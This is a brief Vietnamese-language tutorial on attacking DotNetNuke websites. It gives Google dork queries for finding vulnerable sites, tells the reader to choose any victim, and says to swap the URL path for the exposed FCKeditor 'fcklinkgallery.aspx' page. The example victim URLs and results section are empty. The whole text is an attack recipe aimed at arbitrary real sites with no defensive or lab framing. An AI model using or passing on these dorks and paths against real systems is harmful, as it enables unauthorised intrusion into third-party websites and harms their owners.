Bước 1: Sử dụng google để tìm site chứa lỗ
hổng DNN
:inurl:/tabid/36/language/en-US/Default.aspxInurl:”/portals/0”
Bước 2: Chọn 1 victim bất kỳ, ví dụ:
Bước 3: Thay thế đoạn url
sau:
/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lúc đó, đường link của victim
như sau:
Thông tin thu được: